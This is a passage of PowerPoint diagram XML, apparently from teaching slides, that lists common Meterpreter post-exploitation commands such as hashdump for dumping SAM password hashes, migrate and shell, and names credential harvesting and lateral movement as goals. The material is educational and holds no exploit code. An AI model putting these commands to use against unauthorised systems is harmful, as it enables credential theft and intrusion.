    </dgm:pt>
    <dgm:pt modelId="{E4AB5046-558B-45D9-8339-2B48B88E242D}" type="pres">
      <dgm:prSet presAssocID="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" type="pres">
      <dgm:prSet presAssocID="{381DF832-8D96-4523-B0A9-86E5231B5204}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3C680CB-9B34-4E03-9A63-4A687FCB0F06}" type="pres">
      <dgm:prSet presAssocID="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" type="pres">
      <dgm:prSet presAssocID="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E546C489-E0AF-405C-82E1-9167A2FEACE8}" type="pres">
      <dgm:prSet presAssocID="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" type="pres">
      <dgm:prSet presAssocID="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26D7C3CE-4AFB-4F73-A6DC-C33FF7786649}" type="pres">
      <dgm:prSet presAssocID="{33C24520-CC0E-4D38-A18B-A1068AA95493}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" type="pres">
      <dgm:prSet presAssocID="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B3062C1-A6EB-4B9E-87FE-5A1CFA9B2EB7}" type="pres">
      <dgm:prSet presAssocID="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" type="pres">
      <dgm:prSet presAssocID="{65F63F45-70D5-4A65-8A13-F95973B3A640}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C0216F3-6BAA-40D9-90DD-5B765FC8609D}" type="pres">
      <dgm:prSet presAssocID="{805F1243-4C19-409D-8925-D880BFD6B0B1}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}" type="pres">
      <dgm:prSet presAssocID="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{89F43710-5FB9-4034-8E85-00168AFEEF46}" type="presOf" srcId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" destId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1481EF16-5B35-410F-A230-5655D709DE27}" type="presOf" srcId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" destId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CB0FDF1B-BE2D-4713-9B18-3055D91DA987}" type="presOf" srcId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" destId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" srcOrd="0" destOrd="0" parTransId="{9E0F402D-CEF5-4AEC-92E0-E4468E94BB6F}" sibTransId="{E6A4C218-910E-4AA6-846F-F3EF8D036910}"/>
    <dgm:cxn modelId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{381DF832-8D96-4523-B0A9-86E5231B5204}" srcOrd="3" destOrd="0" parTransId="{3135121C-765B-4731-89CD-2054EC1D506E}" sibTransId="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}"/>
    <dgm:cxn modelId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" srcOrd="1" destOrd="0" parTransId="{DE39B831-8160-45B6-9F6B-8B8B2D17A2AF}" sibTransId="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}"/>
    <dgm:cxn modelId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" srcOrd="6" destOrd="0" parTransId="{F4BE0219-C288-4736-828F-730E70147926}" sibTransId="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}"/>
    <dgm:cxn modelId="{A43FD873-3085-4281-84FC-43789281B6E7}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{65F63F45-70D5-4A65-8A13-F95973B3A640}" srcOrd="7" destOrd="0" parTransId="{FCB238D3-EC65-47C7-8C5C-2673869FECE9}" sibTransId="{805F1243-4C19-409D-8925-D880BFD6B0B1}"/>
    <dgm:cxn modelId="{17AC1179-0B30-42D7-AE6F-E03E451898ED}" type="presOf" srcId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" destId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{43C7D459-B544-410E-8585-C4FA8D8609D8}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" srcOrd="8" destOrd="0" parTransId="{2621FC81-6EE5-433C-BF27-D5577F046C6A}" sibTransId="{E9739069-9C5A-447F-854B-2D28BB687823}"/>
    <dgm:cxn modelId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" srcOrd="4" destOrd="0" parTransId="{6FCA302E-1CB6-4972-904D-640EDBBFEA02}" sibTransId="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}"/>
    <dgm:cxn modelId="{F2638790-9123-4A6F-91EF-34E23E4B9C22}" type="presOf" srcId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" destId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E2248694-6855-4C36-AE5A-E1CA28B15A72}" type="presOf" srcId="{65F63F45-70D5-4A65-8A13-F95973B3A640}" destId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A2575BA9-28F6-45DA-8277-37C902AF6010}" type="presOf" srcId="{381DF832-8D96-4523-B0A9-86E5231B5204}" destId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" srcOrd="5" destOrd="0" parTransId="{3938C548-010B-4C29-8F81-08723059A253}" sibTransId="{33C24520-CC0E-4D38-A18B-A1068AA95493}"/>
    <dgm:cxn modelId="{9BABD8D6-FA72-4178-86A2-F4C8202C370B}" type="presOf" srcId="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" destId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{23703EE0-C3F8-494A-835A-ED3BC5E049A5}" type="presOf" srcId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" destId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" srcOrd="2" destOrd="0" parTransId="{714E40BE-4691-45A6-ADD0-5A730478B412}" sibTransId="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}"/>
    <dgm:cxn modelId="{A29749F8-E6D3-4A59-8B81-7AE0ED661014}" type="presOf" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{24936117-5551-408D-B3DA-B33C3BEC160F}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A4ABDFD7-259E-4593-B6E9-0C6B6134CA03}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{78EBF2F6-3000-4543-824F-EE491F3E9B02}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{41BD0380-1F56-4A51-B622-72AE383A40F7}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{819A8E32-7C55-4C36-8C03-9A418F6A683F}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{8FAC889B-DC2B-476F-BF6B-8AFE6AC2CD39}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B678BB2B-C929-443C-BD98-A1F51FB87413}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{187F745D-BD0D-4A68-BFBB-4F7629975F48}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{E4AB5046-558B-45D9-8339-2B48B88E242D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{812CC0B0-F1FE-4FC5-BDB0-52EC6BF99A66}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2CBA1133-C47C-4C87-9274-A9F4B9411E69}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{D3C680CB-9B34-4E03-9A63-4A687FCB0F06}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{40DA933C-6C7D-48FD-AA38-79979F0986C8}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{168CFFDE-76B4-4D70-8757-C16EBE1CA5FA}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{E546C489-E0AF-405C-82E1-9167A2FEACE8}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2547DC0D-61AB-4608-B465-3CA4792F14CE}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{70B2F0C4-7265-425B-9DB3-B5E088B17FEF}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{26D7C3CE-4AFB-4F73-A6DC-C33FF7786649}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DC76ABF0-ACAC-4835-B05A-D33880F3F917}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{153D5CE5-1DE2-4010-9D2C-BC1317096191}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{7B3062C1-A6EB-4B9E-87FE-5A1CFA9B2EB7}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4839BA31-98F8-4421-BF92-BE62890DBCBA}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2F978D27-0D0D-4808-B079-2C1395081306}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{1C0216F3-6BAA-40D9-90DD-5B765FC8609D}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8F05B360-3F44-4292-A8D4-61091034D16D}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}"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5E5C91-3922-418F-B8F7-464EB36B891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3802C71-E230-405F-B4C0-E81AB3CF5DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Common Meterpreter Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C70C1B72-3E93-4834-B3B0-8C5903EECE07}" type="parTrans" cxnId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3AD596C-65CE-40E6-B95C-B05871B740AA}" type="sibTrans" cxnId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>getuid: Shows current user.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78999592-A927-4B29-AA41-EEB0CBD89704}" type="parTrans" cxnId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6005CB17-1283-4C25-B39A-25A09B46E397}" type="sibTrans" cxnId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C7152C7-70CE-4590-9581-CAD7C040C625}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>ps: Lists running processes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C06557E-9994-4557-A400-DE87286DE6DD}" type="parTrans" cxnId="{87417BB4-463A-4A53-8520-2A36DD68A20E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}" type="sibTrans" cxnId="{87417BB4-463A-4A53-8520-2A36DD68A20E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>migrate [PID]: Moves Meterpreter to another process.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{344A0C3E-BA1B-461E-B7F2-1F6079AFFA65}" type="parTrans" cxnId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}" type="sibTrans" cxnId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2970D06E-C997-4BA8-8DF5-5110013226ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>hashdump: Dumps password hashes from the SAM database.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E83A23C0-42E3-41C1-BDD8-0C9A073E86BD}" type="parTrans" cxnId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66DB45F4-659C-4131-B8FA-FCB3C749616F}" type="sibTrans" cxnId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>search: Locates files on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26F69B7D-9226-4D56-8BEB-4EBD7EA4F6CC}" type="parTrans" cxnId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}" type="sibTrans" cxnId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>shell: Opens a command-line shell on the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0640B4A8-37FB-4C56-9F63-92E2EBD40589}" type="parTrans" cxnId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1196959-A24D-43E0-9C76-4A69D45563D5}" type="sibTrans" cxnId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Post-Exploitation with Meterpreter:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD5B0145-89CC-4971-9FED-BF344596FD67}" type="parTrans" cxnId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}" type="sibTrans" cxnId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>Privilege escalation, lateral movement, credential harvesting, and file searches are key post-exploitation tasks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46E11D4C-907C-4A9A-9CA7-7BC903F65967}" type="parTrans" cxnId="{D1C98779-F4BB-44D7-87CF-72005316C176}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CF4F287-1D54-4E82-80EE-040326C49DCB}" type="sibTrans" cxnId="{D1C98779-F4BB-44D7-87CF-72005316C176}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" type="pres">
      <dgm:prSet presAssocID="{A75E5C91-3922-418F-B8F7-464EB36B891A}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE591548-E246-458E-97D2-E81065480C3A}" type="pres">
      <dgm:prSet presAssocID="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EE90F11-71A2-4A5E-8C8D-0248B580212A}" type="pres">
      <dgm:prSet presAssocID="{F3AD596C-65CE-40E6-B95C-B05871B740AA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" type="pres">
      <dgm:prSet presAssocID="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF89C33F-5E60-42A1-AB50-F7FB1CBD10CF}" type="pres">
      <dgm:prSet presAssocID="{6005CB17-1283-4C25-B39A-25A09B46E397}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" type="pres">
